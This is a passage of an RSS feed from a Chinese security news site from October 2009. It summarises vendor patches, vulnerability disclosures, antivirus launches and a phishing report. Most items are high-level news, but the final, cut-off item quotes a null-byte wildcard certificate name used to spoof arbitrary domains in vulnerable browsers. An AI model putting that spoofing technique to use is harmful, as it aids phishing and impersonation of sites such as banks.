			<content:encoded><![CDATA[<p><a href="http://www.finjan.com/" rel="wp-prettyPhoto[g2953]"></a><a href="http://osss.cn/news/wp-content/uploads/2009/10/Finjan.jpg-598d2cf3e8e407b1.jpeg" rel="wp-prettyPhoto[g2953]"><img class="alignleft size-full wp-image-2954" title="Finjan.jpg-598d2cf3e8e407b1" src="http://osss.cn/news/wp-content/uploads/2009/10/Finjan.jpg-598d2cf3e8e407b1.jpeg" alt="Finjan.jpg-598d2cf3e8e407b1" width="250" height="82" /></a>Finjan的新产品<a href="http://www.finjan.com/content.aspx?id=2379">Vital Cloud</a>和<a href="http://www.finjan.com/content.aspx?id=2380">Vital Cloud hybrid </a>旨在为Managed Security Service Providers(MSSPs)和在偏远地区的企业提供web计算安全。在这方面的关键是敏感数据存储在企业网络而不是云中。Vital Cloud扩展了Finjan的<a href="http://www.finjan.com/Content.aspx?id=190">Unified Web Security</a>包，包含了一个组件可以连接到Amonzon的<a href="http://aws.amazon.com/ec2/">Elastic Compute Cloud</a>(EC2).</p>
<p>据说联合的安全套件可以保护公司员工(不管你在什么地方工作)免受恶意软件和病毒的攻击。管理员可以用Vital Cloud中心的终端，控制和监视远端的设备就像病毒扫描器一样。Vital Cloud Hybrid提供了在云中从on-premise web安全到web安全的转换。Finjan的产品是基于一个专有的，专利的分析过程，能够在转换期间检查数据。如果有需要，在几分钟内管理员就可以添加额外的web扫描工具。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/22/%e5%ae%89%e5%85%a8%e4%b8%93%e5%ae%b6finjan%e6%8f%90%e4%be%9b%e4%ba%91%e4%ba%a7%e5%93%81/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VMware发布其产品的漏洞补丁</title>
		<link>http://osss.cn/news/2009/10/22/vmware%e5%8f%91%e5%b8%83%e5%85%b6%e4%ba%a7%e5%93%81%e7%9a%84%e6%bc%8f%e6%b4%9e%e8%a1%a5%e4%b8%81/</link>
		<comments>http://osss.cn/news/2009/10/22/vmware%e5%8f%91%e5%b8%83%e5%85%b6%e4%ba%a7%e5%93%81%e7%9a%84%e6%bc%8f%e6%b4%9e%e8%a1%a5%e4%b8%81/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 10:59:55 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[VMware]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2947</guid>
		<description><![CDATA[VMware为其ESX Server发布了更新，修复了在DHCP Client，DHCP Server,Service Console 内核和Java Runtime Environment(JRE)

中的漏洞。在安全公告中列出了总共48个CVE条目。这些漏洞可能会被利用来实施denial-of-service（DoS）攻击或破坏系统。

当攻击者在访问console和console 网络的时候，在这种情况下，在Service Console 内核和JRE中的漏洞才有可能被利用，攻击者可以通过LAN穿透ESX Server的DHCP客户端。

<span class="readmore"><a href="http://osss.cn/news/2009/10/22/vmware%e5%8f%91%e5%b8%83%e5%85%b6%e4%ba%a7%e5%93%81%e7%9a%84%e6%bc%8f%e6%b4%9e%e8%a1%a5%e4%b8%81/" title="VMware发布其产品的漏洞补丁">阅读全文——共333字</a></span>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.vmware.com/" rel="wp-prettyPhoto[g2947]"><a href="http://osss.cn/news/wp-content/uploads/2009/10/VMware.jpg-36621c52a45d70c4.jpeg" rel="wp-prettyPhoto[g2947]"><img class="alignleft size-full wp-image-2948" title="VMware.jpg-36621c52a45d70c4" src="http://osss.cn/news/wp-content/uploads/2009/10/VMware.jpg-36621c52a45d70c4.jpeg" alt="VMware.jpg-36621c52a45d70c4" width="180" height="30" /></a>VMware</a>为其<a href="http://www.vmware.com/products/esx/">ESX Server</a>发布了更新，修复了在DHCP Client，DHCP Server,Service Console 内核和Java Runtime Environment(JRE)</p>
<p>中的漏洞。在安全公告中列出了总共48个CVE条目。这些漏洞可能会被利用来实施denial-of-service（DoS）攻击或破坏系统。</p>
<p>当攻击者在访问console和console 网络的时候，在这种情况下，在Service Console 内核和JRE中的漏洞才有可能被利用，攻击者可以通过LAN穿透ESX Server的DHCP客户端。</p>
<p>在DHCP和JRE中的漏洞，vCenter，VirtualCenter和Server 2.0中也受到了感染。但是，NMware仍在为这些产品修复补丁。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/22/vmware%e5%8f%91%e5%b8%83%e5%85%b6%e4%ba%a7%e5%93%81%e7%9a%84%e6%bc%8f%e6%b4%9e%e8%a1%a5%e4%b8%81/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>新版本的phpMyAdmin修复了安全漏洞</title>
		<link>http://osss.cn/news/2009/10/17/%e6%96%b0%e7%89%88%e6%9c%ac%e7%9a%84phpmyadmin%e4%bf%ae%e5%a4%8d%e4%ba%86%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e/</link>
		<comments>http://osss.cn/news/2009/10/17/%e6%96%b0%e7%89%88%e6%9c%ac%e7%9a%84phpmyadmin%e4%bf%ae%e5%a4%8d%e4%ba%86%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e/#comments</comments>
		<pubDate>Sat, 17 Oct 2009 01:32:10 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[phpMyAdmin]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2782</guid>
		<description><![CDATA[为phpMyAdmin数据库管理工具发布了一个安全更新。新的版本是2.11.9.6和3.2.2.1。根据开发者的报告，先前的版本包含两个编程方面的瑕疵，易受到跨网站脚本(XSS)的攻击，能够注入任意的SQL命令。

XSS的漏洞，当受控制的链接点击时，允许攻击者通过特制的表的名字在受害者的phpMyAdmin网页中，嵌入任意的JavaScript代码。而SQL注入的漏洞是由导出PDF的一个参数的错误引起的，只有在认证的用户中才会触发。考虑到这些漏洞的危害，建议用户升级到新版本。

]]></description>
			<content:encoded><![CDATA[<p>为<a href="http://www.phpmyadmin.net/">phpMyAdmin</a>数据库管理工具发布了一个安全更新。新的版本是2.11.9.6和3.2.2.1。根据开发者的<a href="http://www.phpmyadmin.net/home_page/security/PMASA-2009-6.php">报告</a>，先前的版本包含两个编程方面的瑕疵，易受到跨网站脚本(XSS)的攻击，能够注入任意的SQL命令。</p>
<p>XSS的漏洞，当受控制的链接点击时，允许攻击者通过特制的表的名字在受害者的phpMyAdmin网页中，嵌入任意的JavaScript代码。而SQL注入的漏洞是由导出PDF的一个参数的错误引起的，只有在认证的用户中才会触发。考虑到这些漏洞的危害，建议用户升级到新版本。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/17/%e6%96%b0%e7%89%88%e6%9c%ac%e7%9a%84phpmyadmin%e4%bf%ae%e5%a4%8d%e4%ba%86%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe：修复了Acrobat和Reader中的29个漏洞</title>
		<link>http://osss.cn/news/2009/10/15/adobe%ef%bc%9a%e4%bf%ae%e5%a4%8d%e4%ba%86acrobat%e5%92%8creader%e4%b8%ad%e7%9a%8429%e4%b8%aa%e6%bc%8f%e6%b4%9e/</link>
		<comments>http://osss.cn/news/2009/10/15/adobe%ef%bc%9a%e4%bf%ae%e5%a4%8d%e4%ba%86acrobat%e5%92%8creader%e4%b8%ad%e7%9a%8429%e4%b8%aa%e6%bc%8f%e6%b4%9e/#comments</comments>
		<pubDate>Thu, 15 Oct 2009 12:09:00 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[Adobe Acrobat Reader]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2728</guid>
		<description><![CDATA[Adobe为其Acrobat和Reader产品发布了更新，修复了29个安全漏洞。先前被黑客利用的严重的漏洞在这次更新中也得到了修复。

根据Adobe公司说，Windows，Machintosh 和UNIX下的Acrobat和Reader的9.1.3和8.1.6版本，以及Windows，Macintosh下的7.1.3版本，会受到感染。现在Adobe Reader和Acrobat 9.2，8.1。7和7.1.4以及解决了这些漏洞，现在可以使用。

建议所有的Reader和Acrobat(Windows ,Macintosh)的用户尽可能快的升级到最新版本。该更新包含在Adobe为Adobe Acrobat和Adobe Reader第二次发布的quarterly security updates中。

]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2729" title="Adobe-ac13a41780d68cc2" src="http://osss.cn/news/wp-content/uploads/2009/10/Adobe-ac13a41780d68cc2.gif" alt="Adobe-ac13a41780d68cc2" width="117" height="161" />Adobe为其Acrobat和Reader产品发布了更新，修复了29个安全漏洞。先前被黑客利用的严重的漏洞在这次更新中也得到了修复。</p>
<p>根据Adobe公司说，Windows，Machintosh 和UNIX下的Acrobat和Reader的9.1.3和8.1.6版本，以及Windows，Macintosh下的7.1.3版本，会受到感染。现在Adobe Reader和Acrobat 9.2，8.1。7和7.1.4以及解决了这些漏洞，现在可以使用。</p>
<p>建议所有的<a href="http://get.adobe.com/reader/otherversions/">Reader</a>和Acrobat(<a href="http://www.adobe.com/support/downloads/product.jsp?product=1&amp;platform=Windows">Windows</a> ,<a href="http://www.adobe.com/support/downloads/product.jsp?product=1&amp;platform=Macintosh">Macintosh</a>)的用户尽可能快的升级到最新版本。该更新包含在Adobe为Adobe Acrobat和Adobe Reader第二次发布的<a href="http://www.h-online.com/news/item/Adobe-to-release-quarterly-security-updates-741685.html">quarterly security updates中。</a></p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/15/adobe%ef%bc%9a%e4%bf%ae%e5%a4%8d%e4%ba%86acrobat%e5%92%8creader%e4%b8%ad%e7%9a%8429%e4%b8%aa%e6%bc%8f%e6%b4%9e/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>新的Android弱点披露</title>
		<link>http://osss.cn/news/2009/10/12/%e6%96%b0%e7%9a%84android%e5%bc%b1%e7%82%b9%e6%8a%ab%e9%9c%b2/</link>
		<comments>http://osss.cn/news/2009/10/12/%e6%96%b0%e7%9a%84android%e5%bc%b1%e7%82%b9%e6%8a%ab%e9%9c%b2/#comments</comments>
		<pubDate>Mon, 12 Oct 2009 13:22:46 +0000</pubDate>
		<dc:creator>雪山の小兔</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[Android]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2658</guid>
		<description><![CDATA[安全专家们发现了两个谷歌Android移动平台的弱点，可以导致拒绝服务攻击。

谷歌Android移动平台已经变得越来越受到人们的欢迎，而Open Source Computer Emergency Response Team（开源计算机紧急响应小组)发现了两个1.5版本的漏洞，不过这两个漏洞现在已经被谷歌打上了补丁。

根据oCert安全咨询的内容，第一个漏洞出现Android处理文本信息的时候。一个特殊的畸形SMS可以导致一个让手机和蜂窝网络断开连接。这个畸形的SMS由一个错误格式的WAP Push信息组成，可以在手机应用程序里导致一个ArrayIndexOutOfBoundsException（数组越界异常）。

<span class="readmore"><a href="http://osss.cn/news/2009/10/12/%e6%96%b0%e7%9a%84android%e5%bc%b1%e7%82%b9%e6%8a%ab%e9%9c%b2/" title="新的Android弱点披露">阅读全文——共545字</a></span>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-421" style="margin-left: 8px; margin-right: 8px;" title="android" src="http://osss.cn/news/wp-content/uploads/2009/07/android.jpg" alt="android" width="130" height="130" />安全专家们发现了两个谷歌Android移动平台的弱点，可以导致拒绝服务攻击。</p>
<p>谷歌Android移动平台已经变得越来越受到人们的欢迎，而Open Source Computer Emergency Response Team（开源计算机紧急响应小组)发现了两个1.5版本的漏洞，不过这两个漏洞现在已经被谷歌打上了补丁。</p>
<p>根据<a href="http://www.ocert.org/advisories/ocert-2009-014.html">oCert安全咨询</a>的内容，第一个漏洞出现Android处理文本信息的时候。一个特殊的畸形SMS可以导致一个让手机和蜂窝网络断开连接。这个畸形的SMS由一个错误格式的WAP Push信息组成，可以在手机应用程序里导致一个ArrayIndexOutOfBoundsException（数组越界异常）。</p>
<p>之后手机应用会无声地重启，会结束通话和断开连接。如果手机的SIM卡被一个PIN保护着，那么用户会被要求重新输入PIN码，会让用户耽误更多的时间带来更多的麻烦。如果这个bug被反复触发，将会引发一个拒绝服务攻击。</p>
<div>
<p>第二个漏洞出现在Android Dalvik API。一个特殊的恶意申请可以触发这个bug，如果用户正在下载或者执行这个API，那将会引发这个脆弱的API功能和重启系统进程。如果开发者无心地在其他地方调用了这个API，同样会引发这种情况。触发这个bug被认为是符合拒绝服务条件的。</p></div>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/12/%e6%96%b0%e7%9a%84android%e5%bc%b1%e7%82%b9%e6%8a%ab%e9%9c%b2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache 2.2.14发布,修正了三个漏洞</title>
		<link>http://osss.cn/news/2009/10/10/apache-2-2-14%e5%8f%91%e5%b8%83%e4%bf%ae%e6%ad%a3%e4%ba%86%e4%b8%89%e4%b8%aa%e6%bc%8f%e6%b4%9e/</link>
		<comments>http://osss.cn/news/2009/10/10/apache-2-2-14%e5%8f%91%e5%b8%83%e4%bf%ae%e6%ad%a3%e4%ba%86%e4%b8%89%e4%b8%aa%e6%bc%8f%e6%b4%9e/#comments</comments>
		<pubDate>Fri, 09 Oct 2009 17:17:32 +0000</pubDate>
		<dc:creator>雪山の小兔</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[Apache]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2603</guid>
		<description><![CDATA[Apache HTTP服务器2.2.14版本进行了一些有意义的bug修复。

新的Apache服务器修复了三个漏洞，两个严重等级为低，一个为中等，另外修复了一系列其他的bug。此次修复所做的变更通知单已经发布，而且新版本的Apache服务器已经可以在很多镜像下载到。

等级为低的两个漏洞均发现在mod_proxy_ftp模块。其中一个漏洞是由空指针的错误引用导致的，一个恶意的代理服务器可以通过EPSV或者PASV指令的异常应用，从而通过该漏洞挂掉一个子进程，造成一个受限的拒绝服务攻击。另外一个漏洞则是：在一个反向代理配置中，一个远程的攻击者可以使用该缺陷绕开拟访问的限制，攻击者先是创造一个精心推敲的授权HTTP头，然后就能肆意发送指令给FTP服务器。

<span class="readmore"><a href="http://osss.cn/news/2009/10/10/apache-2-2-14%e5%8f%91%e5%b8%83%e4%bf%ae%e6%ad%a3%e4%ba%86%e4%b8%89%e4%b8%aa%e6%bc%8f%e6%b4%9e/" title="Apache 2.2.14发布,修正了三个漏洞">阅读全文——共457字</a></span>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2520" title="apache" src="http://osss.cn/news/wp-content/uploads/2009/10/apache.jpeg" alt="apache" width="104" height="78" />Apache HTTP服务器2.2.14版本进行了一些有意义的bug修复。</p>
<p>新的Apache服务器修复了三个<a href="http://httpd.apache.org/security/vulnerabilities_22.html">漏洞</a>，两个严重等级为低，一个为中等，另外修复了一系列其他的bug。此次修复所做的<a href="http://www.apache.org/dist/httpd/CHANGES_2.2.14">变更通知单</a>已经发布，而且新版本的Apache服务器已经可以在很多镜像<a href="http://httpd.apache.org/download.cgi">下载</a>到。</p>
<p>等级为低的两个漏洞均发现在mod_proxy_ftp模块。其中一个漏洞是由空指针的错误引用导致的，一个恶意的代理服务器可以通过EPSV或者PASV指令的异常应用，从而通过该漏洞挂掉一个子进程，造成一个受限的拒绝服务攻击。另外一个漏洞则是：在一个反向代理配置中，一个远程的攻击者可以使用该缺陷绕开拟访问的限制，攻击者先是创造一个精心推敲的授权HTTP头，然后就能肆意发送指令给FTP服务器。</p>
<p>等级为中的漏洞发现在APR模块，该bug是一个错误的故障处理从而导致影响到了Solaris pollset支持（Event Port backend）。Solaris服务器若是使用了prefork或者event MPMs，远程攻击者就可以通过触发该事件导致一个拒绝服务攻击。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/10/apache-2-2-14%e5%8f%91%e5%b8%83%e4%bf%ae%e6%ad%a3%e4%ba%86%e4%b8%89%e4%b8%aa%e6%bc%8f%e6%b4%9e/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AVG 9.0 病毒扫描软件发布</title>
		<link>http://osss.cn/news/2009/10/08/avg-9-0-%e7%97%85%e6%af%92%e6%89%ab%e6%8f%8f%e8%bd%af%e4%bb%b6%e5%8f%91%e5%b8%83/</link>
		<comments>http://osss.cn/news/2009/10/08/avg-9-0-%e7%97%85%e6%af%92%e6%89%ab%e6%8f%8f%e8%bd%af%e4%bb%b6%e5%8f%91%e5%b8%83/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 13:42:49 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[AVG，Security]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2593</guid>
		<description><![CDATA[AVG产品家族的9.0版本承诺，该版本比以前的版本更快，更安全，更简单，更便宜。为了增加速度，该提供商一体化了反病毒/反间谍扫描，第一次扫描时标记所有的文件为安全或者为不安全。被标记为安全的文件将被跳过，直到文件存储结构改变。AV-Test.org已经证实在测试中速度更快。

AVG网络安全对在Windows Xp上已知的病毒，蠕虫，木马有97.64%的基于特征的检测。该工具会对94%的广告和间谍软件发出警告。在扫描600，000个干净的文件时没有发出一个错误的警告，在25次的攻击中24次，成功对感染的PC消毒，当然并不能排除所有的踪迹如，遗漏了一个的文件。

<span class="readmore"><a href="http://osss.cn/news/2009/10/08/avg-9-0-%e7%97%85%e6%af%92%e6%89%ab%e6%8f%8f%e8%bd%af%e4%bb%b6%e5%8f%91%e5%b8%83/" title="AVG 9.0 病毒扫描软件发布">阅读全文——共510字</a></span>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2594" title="avg" src="http://osss.cn/news/wp-content/uploads/2009/10/avg.png" alt="avg" width="149" height="61" />AVG<a href="http://www.avg.com/gb-en/download-trial">产品家族</a>的9.0版本承诺，该版本比以前的版本更快，更安全，更简单，更便宜。为了增加速度，该提供商一体化了反病毒/反间谍扫描，第一次扫描时标记所有的文件为安全或者为不安全。被标记为安全的文件将被跳过，直到文件存储结构改变。<a href="http://www.av-test.org/">AV-Test.org</a>已经证实在测试中速度更快。</p>
<p>AVG网络安全对在Windows Xp上已知的病毒，蠕虫，木马有97.64%的基于特征的检测。该工具会对94%的广告和间谍软件发出警告。在扫描600，000个干净的文件时没有发出一个错误的警告，在25次的攻击中24次，成功对感染的PC消毒，当然并不能排除所有的踪迹如，遗漏了一个的文件。</p>
<p>在查找删除25个root kits是扫描器只犯了一个错误，遗漏了一个隐藏的文件。在启发是检测和特征检测不能发现的污染物，在使用行为监测时，AVG能够找到和纠正80%的污染物。LinkScanner能够阻塞受感染的网站，能够检测到90%.</p>
<p>防火墙在这个套件中完全经过修正，提供商说在防火墙中使用了一个数据库来帮助决定一个程序是否允许和系统的组件通信，或者是否阻塞该通信。AVG的Indentity Protection,也整合到了套件中，希望能和其他的组件更好的起作用。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/08/avg-9-0-%e7%97%85%e6%af%92%e6%89%ab%e6%8f%8f%e8%bd%af%e4%bb%b6%e5%8f%91%e5%b8%83/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>报告：Phishing和scareware 上升</title>
		<link>http://osss.cn/news/2009/10/05/%e6%8a%a5%e5%91%8a%ef%bc%9aphishing%e5%92%8cscareware-%e4%b8%8a%e5%8d%87/</link>
		<comments>http://osss.cn/news/2009/10/05/%e6%8a%a5%e5%91%8a%ef%bc%9aphishing%e5%92%8cscareware-%e4%b8%8a%e5%8d%87/#comments</comments>
		<pubDate>Mon, 05 Oct 2009 14:34:45 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[APWG]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2486</guid>
		<description><![CDATA[根据Anti-Phishing Working Group(APWG)的报告(pdf)，钓鱼攻击和恶意的反恶意软件(也就是scareware)的数量在以“前所未有的速度”上升。这份报告中，APWG说，在2009年上半年，钓鱼攻击的网站，有大约5/4的声称会提供支付和金融服务。总共有485，000相关的scareware被发现。在1月这一个月中大约有22，000个被报告，在6月上升到152，000个，这说明了非常强劲的上升趋势。

Scareware会通过在网页上弹出窗口和一些广告，试图以此来欺骗用户使他们认为他们的PC感染病毒，就像最近在New York Times网站出现的标题广告。而这个标题会链接到欺诈者的关于反间谍和反病毒的网站。而这些软件根本没什么用处，在安装了之后，会列出一些假的病毒报告，这样会要求你支付费用来清除这些病毒。怎么样辨别scareware的信息，免受它的侵害，这里有一篇文章是由H Security发布的“Thieves and charlatans &#8211; Rogue anti-virus products”

]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2487" title="apwg" src="http://osss.cn/news/wp-content/uploads/2009/10/apwg.jpg" alt="apwg" width="250" height="41" />根据<a href="http://www.antiphishing.org/">Anti-Phishing Working Group</a>(APWG)的<a href="http://www.antiphishing.org/reports/apwg_report_h1_2009.pdf">报告</a>(pdf)，钓鱼攻击和恶意的反恶意软件(也就是scareware)的数量在以“前所未有的速度”上升。这份报告中，APWG说，在2009年上半年，钓鱼攻击的网站，有大约5/4的声称会提供支付和金融服务。总共有485，000相关的scareware被发现。在1月这一个月中大约有22，000个被报告，在6月上升到152，000个，这说明了非常强劲的上升趋势。</p>
<p>Scareware会通过在网页上弹出窗口和一些广告，试图以此来欺骗用户使他们认为他们的PC感染病毒，就像<a href="http://www.h-online.com/security/New-York-Times-shows-bad-banner-ad--/news/114242">最近</a>在New York Times网站出现的标题广告。而这个标题会链接到欺诈者的关于反间谍和反病毒的网站。而这些软件根本没什么用处，在安装了之后，会列出一些假的病毒报告，这样会要求你支付费用来清除这些病毒。怎么样辨别scareware的信息，免受它的侵害，这里有一篇文章是由H Security发布的“<a title="Rogue anti-virus products" href="http://www.h-online.com/security/Rogue-anti-virus-products--/features/112231">Thieves and charlatans &#8211; Rogue anti-virus products</a>”</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/05/%e6%8a%a5%e5%91%8a%ef%bc%9aphishing%e5%92%8cscareware-%e4%b8%8a%e5%8d%87/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Astaro Security Gateway 7.5 发布</title>
		<link>http://osss.cn/news/2009/10/02/astaro-security-gateway-7-5-%e5%8f%91%e5%b8%83/</link>
		<comments>http://osss.cn/news/2009/10/02/astaro-security-gateway-7-5-%e5%8f%91%e5%b8%83/#comments</comments>
		<pubDate>Thu, 01 Oct 2009 16:34:51 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[社区]]></category>
		<category><![CDATA[软件]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2337</guid>
		<description><![CDATA[安全专家Astaro已经宣布它的Unfied Thread Manangement(UTM)的一个产品Astro Security Gateway7.5版本已经可以使用。据他介绍说，最新的版本包含700个变化和超过50个新的特性。

Astaro Security Gateway7.5一个新的特性是针对多核的操作系统的而加入了Intrusion protection Engine ,是一个实时的宽带检测包括了 Dshboard的改进和使用认证门户的透明的HTTP代理模式。另外，为了能够克隆对象便于重新使用，用户现在可以使用Import/Export Widget导入和导出他们的变量列表。其他的改进包括Dynamic Host Configuration Protocol(DHCP)配置，和web安全的支持和扩展的网络安全报告。

<span class="readmore"><a href="http://osss.cn/news/2009/10/02/astaro-security-gateway-7-5-%e5%8f%91%e5%b8%83/" title="Astaro Security Gateway 7.5 发布">阅读全文——共436字</a></span>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2338" style="margin-left: 8px; margin-right: 8px;" title="0" src="http://osss.cn/news/wp-content/uploads/2009/10/0.png" alt="0" width="200" height="72" />安全专家<a href="http://www.astaro.com/">Astaro</a>已经<a href="http://up2date.astaro.com/2009/09/astaro_gateway_7500_softreleas.html">宣布</a>它的<a href="http://en.wikipedia.org/wiki/Unified_Threat_Management">Unfied Thread Manangement</a>(UTM)的一个产品<a href="http://up2date.astaro.com/astaro_security_gateway_v7/">Astro Security Gateway</a>7.5版本已经可以使用。据他介绍说，最新的版本包含700个变化和超过50个新的特性。</p>
<p>Astaro Security Gateway7.5一个新的特性是针对多核的操作系统的而加入了Intrusion protection Engine ,是一个实时的宽带检测包括了 Dshboard的改进和使用认证门户的透明的HTTP代理模式。另外，为了能够克隆对象便于重新使用，用户现在可以使用Import/Export Widget导入和导出他们的变量列表。其他的改进包括<a href="http://en.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol">Dynamic Host Configuration Protocol</a>(DHCP)配置，和web安全的支持和扩展的网络安全报告。</p>
<p>更详细的内容已经发布，包括安装说明和全部的改进列表，可以在发布的<a href="http://up2date.astaro.com/AxG_V7.5_releasenotes.pdf">注意事项</a>中看到。Astaro Gateway7.5已经可以<a href="http://up2date.astaro.com/2009/09/axg_75_iso_images_available.html">下载</a>。Astaro的社区是<a href="http://www.astaro.org/">astraro.org</a></p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/02/astaro-security-gateway-7-5-%e5%8f%91%e5%b8%83/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google在Chrome 3中修复了漏洞</title>
		<link>http://osss.cn/news/2009/10/02/google%e5%9c%a8chrome-3%e4%b8%ad%e4%bf%ae%e5%a4%8d%e4%ba%86%e6%bc%8f%e6%b4%9e/</link>
		<comments>http://osss.cn/news/2009/10/02/google%e5%9c%a8chrome-3%e4%b8%ad%e4%bf%ae%e5%a4%8d%e4%ba%86%e6%bc%8f%e6%b4%9e/#comments</comments>
		<pubDate>Thu, 01 Oct 2009 16:14:56 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[Chrome，Security]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2334</guid>
		<description><![CDATA[Google已经发布了Chrome 3的3.0.195.24版本，这是一个安全更新，修复了其中一个高风险的漏洞。这个漏洞是Chrome的V8 JavaScript引擎在使用dtoa()时会把strings分析为浮点数，攻击者利用这一点可以执行任意的代码。据说该漏洞包含在Chrome sandbox中。根据Google说，一旦攻击成功，“受害者会在攻击者的控制下访问网页”。

Chrome的用户现在可以通过内置的更新函数来更新。

]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2335" title="0" src="http://osss.cn/news/wp-content/uploads/2009/10/02.jpg" alt="0" width="150" height="55" /><a href="http://www.google.co.uk/">Google</a>已经发布了<a href="http://www.h-online.com/security/Google-Chrome-3-0-released--/news/114247">Chrome 3</a>的3.0.195.24版本，这是一个安全更新，修复了其中一个高风险的漏洞。这个<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689">漏洞</a>是Chrome的V8 JavaScript引擎在使用dtoa()时会把strings分析为浮点数，攻击者利用这一点可以执行任意的代码。据说该漏洞包含在<a href="http://dev.chromium.org/developers/design-documents/sandbox">Chrome sandbox</a>中。根据Google说，一旦攻击成功，“受害者会在攻击者的控制下访问网页”。</p>
<p>Chrome的用户现在可以通过内置的<a href="http://www.google.com/support/chrome/bin/answer.py?hl=en&amp;answer=95414">更新函数</a>来更新。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/02/google%e5%9c%a8chrome-3%e4%b8%ad%e4%bf%ae%e5%a4%8d%e4%ba%86%e6%bc%8f%e6%b4%9e/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>通过SSL认证的把戏被公布</title>
		<link>http://osss.cn/news/2009/10/01/%e9%80%9a%e8%bf%87ssl%e8%ae%a4%e8%af%81%e7%9a%84%e6%8a%8a%e6%88%8f%e8%a2%ab%e5%85%ac%e5%b8%83/</link>
		<comments>http://osss.cn/news/2009/10/01/%e9%80%9a%e8%bf%87ssl%e8%ae%a4%e8%af%81%e7%9a%84%e6%8a%8a%e6%88%8f%e8%a2%ab%e5%85%ac%e5%b8%83/#comments</comments>
		<pubDate>Thu, 01 Oct 2009 15:38:34 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[Security，SSL]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2320</guid>
		<description><![CDATA[在Noisebridge的黑客邮件列表中，安全专家Jacob Appelbaum公布了一个SLL认证书和相关的私钥，这样在脆弱的浏览器下，不管是不是该认证的提交域，都可以避免引起web服务器的警告。例如，网络钓鱼者，可以用这个认证来伪装他们的服务器作为合法的银行服务器，这样只有这个认证被严密的检查才回被发现。

在他的把戏中，根据Moxie Marlinspike在黑帽会议上说明的方法，Appelbaum修改域名中间0字符，像Marlinspike的thoughtcrime.org域名，Applelbaum输入*\00thoughtcrime.noisebridge.net,这样可以为任意的域名创建一个有效的通配符：

